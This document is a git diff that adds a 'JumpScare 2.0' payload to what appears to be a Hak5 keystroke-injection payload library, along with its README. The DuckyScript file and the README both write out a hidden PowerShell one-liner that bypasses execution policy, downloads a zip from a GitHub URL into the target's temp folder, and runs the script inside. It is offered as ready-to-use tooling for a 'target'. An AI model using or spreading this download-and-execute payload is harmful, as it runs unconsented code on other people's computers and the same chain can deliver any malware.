diff --git a/payloads/library/prank/-OMG-JumpScare-2.0/JumpScare2.0.txt b/payloads/library/prank/-OMG-JumpScare-2.0/JumpScare2.0.txt new file mode 100644 index 0000000..baaf995 --- /dev/null +++ b/payloads/library/prank/-OMG-JumpScare-2.0/JumpScare2.0.txt @@ -0,0 +1,17 @@ +* Title: JumpScare 2.0 + +* Author: I am Jakoby + +* Description: This is a one liner payload that will execute and wait until a mouse movement is detected. Once one is a jumpscare will be played at max volume in full screen + +* Target: Windows 10, 11 + +* -------------------------------------------------------------------------------------- +* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +* -------------------------------------------------------------------------------------- + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip';$Z="$env:TMP"+'\js.zip';$D="$env:TMP"+'\js';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\js.ps1 +ENTER diff --git a/payloads/library/prank/-OMG-JumpScare-2.0/ReadMe.md b/payloads/library/prank/-OMG-JumpScare-2.0/ReadMe.md new file mode 100644 index 0000000..99c4819 --- /dev/null +++ b/payloads/library/prank/-OMG-JumpScare-2.0/ReadMe.md @@ -0,0 +1,117 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# JumpScare 2.0 + +A script used to jumpscare your target + +## Description + +This script will jumpscare your target + +A jumpscare video will be downloaded to their temp directory + +When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip';$Z="$env:TMP"+'\js.zip';$D="$env:TMP"+'\js';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\js.ps1 +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +